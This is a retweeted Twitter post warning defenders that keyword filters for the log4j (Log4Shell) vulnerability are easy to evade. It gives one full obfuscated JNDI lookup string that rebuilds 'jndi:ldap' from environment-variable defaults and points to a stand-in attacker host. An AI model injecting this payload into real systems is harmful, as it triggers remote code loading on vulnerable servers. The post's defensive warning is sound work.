Twitter Feed
@volkadav ("Mike Jackson") retweeted:
@Rezn0k ("Brandon Forbes") wrote:
If you're filtering on "ldap", "jndi", or the ${lower:x} method, I have bad news for you:
${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attacker.com/a}
This gets past every filter I've found so far. There's no shortage of these bypasses.
#log4j